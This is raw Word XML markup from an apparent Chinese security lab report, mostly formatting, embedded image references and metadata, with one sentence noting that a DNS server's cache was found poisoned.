    <w:p w14:paraId="134143C3" w14:textId="32629B46" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F8E759" wp14:editId="6C3626DC">
            <wp:extent cx="4597400" cy="99519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0775" cy="100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D502" w14:textId="0C1F3C6A" w:rsidR="002242A4" w:rsidRDefault="00B2199E" w:rsidP="000A6238">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA99B70" wp14:editId="351CF152">
            <wp:extent cx="4484180" cy="36398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7466" cy="364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F04C" w14:textId="59C69417" w:rsidR="00B2199E" w:rsidRDefault="00B2199E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>进入D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">NS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server查看cache，发现已中毒：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D6D00" w14:textId="60F20670" w:rsidR="00B2199E" w:rsidRPr="00DD4036" w:rsidRDefault="00B2199E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B89CE28" wp14:editId="794B831E">
            <wp:extent cx="5274310" cy="11150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99E" w:rsidRPr="00DD40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2BA840" w14:textId="77777777" w:rsidR="00116006" w:rsidRDefault="00116006" w:rsidP="00C51908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="25716BD7" w14:textId="77777777" w:rsidR="00116006" w:rsidRDefault="00116006" w:rsidP="00C51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461D00" w14:textId="77777777" w:rsidR="00116006" w:rsidRDefault="00116006" w:rsidP="00C51908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5C197412" w14:textId="77777777" w:rsidR="00116006" w:rsidRDefault="00116006" w:rsidP="00C519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92562"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD282704"/>
    <w:lvl w:ilvl="0" w:tplc="C27C82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7A2739"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFF8EE64"/>
    <w:lvl w:ilvl="0" w:tplc="5EBA7E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F42595"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7266CBA"/>
    <w:lvl w:ilvl="0" w:tplc="434415CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1．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E328E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="534AD5A2"/>
    <w:lvl w:ilvl="0" w:tplc="F6A4924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0B269DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA26D7FC"/>
    <w:lvl w:ilvl="0" w:tplc="7F58C824">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1．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F007A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8B8ECEA"/>
    <w:lvl w:ilvl="0" w:tplc="DD4E9D8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86A"/>
    <w:rsid w:val="00031460"/>
    <w:rsid w:val="00074D21"/>
    <w:rsid w:val="000A6238"/>
    <w:rsid w:val="000B534D"/>
    <w:rsid w:val="000D2A01"/>
    <w:rsid w:val="000D44FA"/>
    <w:rsid w:val="000D796A"/>
    <w:rsid w:val="00114295"/>
    <w:rsid w:val="00116006"/>
    <w:rsid w:val="00132486"/>
    <w:rsid w:val="0018016A"/>
    <w:rsid w:val="001F4A28"/>
    <w:rsid w:val="00223F0F"/>
    <w:rsid w:val="002242A4"/>
    <w:rsid w:val="00226B27"/>
    <w:rsid w:val="0023565F"/>
    <w:rsid w:val="00252F92"/>
    <w:rsid w:val="00261CC7"/>
    <w:rsid w:val="00266ED3"/>
    <w:rsid w:val="00271210"/>
    <w:rsid w:val="002D7D04"/>
    <w:rsid w:val="00306F2D"/>
    <w:rsid w:val="0032339C"/>
    <w:rsid w:val="0033484C"/>
    <w:rsid w:val="003370FB"/>
    <w:rsid w:val="00344969"/>
    <w:rsid w:val="00383334"/>
    <w:rsid w:val="00390B5D"/>
    <w:rsid w:val="003910C2"/>
    <w:rsid w:val="003C7D40"/>
    <w:rsid w:val="003E2B80"/>
    <w:rsid w:val="003E46E3"/>
    <w:rsid w:val="003F1888"/>
    <w:rsid w:val="0040123E"/>
    <w:rsid w:val="00411EAC"/>
    <w:rsid w:val="00413367"/>
    <w:rsid w:val="00474FF1"/>
    <w:rsid w:val="004A398F"/>
    <w:rsid w:val="004C6F9E"/>
    <w:rsid w:val="004D50FE"/>
    <w:rsid w:val="00527933"/>
    <w:rsid w:val="00546A65"/>
    <w:rsid w:val="00566C3E"/>
    <w:rsid w:val="00586290"/>
    <w:rsid w:val="005B1B3F"/>
    <w:rsid w:val="005F272C"/>
    <w:rsid w:val="006421A9"/>
    <w:rsid w:val="006540EA"/>
    <w:rsid w:val="0067699E"/>
    <w:rsid w:val="006F46B8"/>
    <w:rsid w:val="007007B4"/>
    <w:rsid w:val="007119B4"/>
    <w:rsid w:val="0072386A"/>
    <w:rsid w:val="00743B5D"/>
    <w:rsid w:val="0077087C"/>
    <w:rsid w:val="00771D4E"/>
    <w:rsid w:val="00794353"/>
    <w:rsid w:val="007A5DC7"/>
    <w:rsid w:val="007B5106"/>
    <w:rsid w:val="007B6E59"/>
    <w:rsid w:val="007E1B48"/>
    <w:rsid w:val="00816CBB"/>
    <w:rsid w:val="00827D9C"/>
    <w:rsid w:val="00846D29"/>
    <w:rsid w:val="008504E6"/>
    <w:rsid w:val="00897F52"/>
    <w:rsid w:val="009118DD"/>
    <w:rsid w:val="00926B71"/>
    <w:rsid w:val="009819B1"/>
    <w:rsid w:val="009B4AC6"/>
    <w:rsid w:val="009D1EA0"/>
    <w:rsid w:val="009D27BA"/>
    <w:rsid w:val="00AA69D5"/>
    <w:rsid w:val="00AC03AB"/>
    <w:rsid w:val="00AD6DE8"/>
    <w:rsid w:val="00B2199E"/>
    <w:rsid w:val="00B527E9"/>
    <w:rsid w:val="00B902DB"/>
    <w:rsid w:val="00BA5145"/>
    <w:rsid w:val="00C0589D"/>
    <w:rsid w:val="00C07DF8"/>
    <w:rsid w:val="00C331E8"/>
    <w:rsid w:val="00C37630"/>
    <w:rsid w:val="00C51908"/>
    <w:rsid w:val="00CA5B3E"/>
    <w:rsid w:val="00CE72C7"/>
    <w:rsid w:val="00D85ACB"/>
    <w:rsid w:val="00D87386"/>
    <w:rsid w:val="00D945E2"/>
    <w:rsid w:val="00D95668"/>
    <w:rsid w:val="00DA3591"/>
    <w:rsid w:val="00DD4036"/>
    <w:rsid w:val="00DE2354"/>
    <w:rsid w:val="00DF5236"/>
    <w:rsid w:val="00E07408"/>
    <w:rsid w:val="00E32D07"/>
    <w:rsid w:val="00E532EE"/>
    <w:rsid w:val="00E95193"/>
    <w:rsid w:val="00EA6FC4"/>
    <w:rsid w:val="00EC0CC8"/>
    <w:rsid w:val="00EE1E70"/>
    <w:rsid w:val="00EE7382"/>
    <w:rsid w:val="00F238E0"/>
    <w:rsid w:val="00F34B64"/>
    <w:rsid w:val="00F56CF0"/>
    <w:rsid w:val="00F96629"/>
    <w:rsid w:val="00F97799"/>
    <w:rsid w:val="00FA765F"/>
    <w:rsid w:val="00FE1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7BBE7A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6FFEE3DE-B69C-4223-8A1A-E67D14C8F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484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2339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2339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C519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5190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519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519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baidu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4108</TotalTime>
  <Pages>7</Pages>
  <Words>288</Words>
  <Characters>1644</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop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XT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>R XT</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-02T12:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-18T03:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>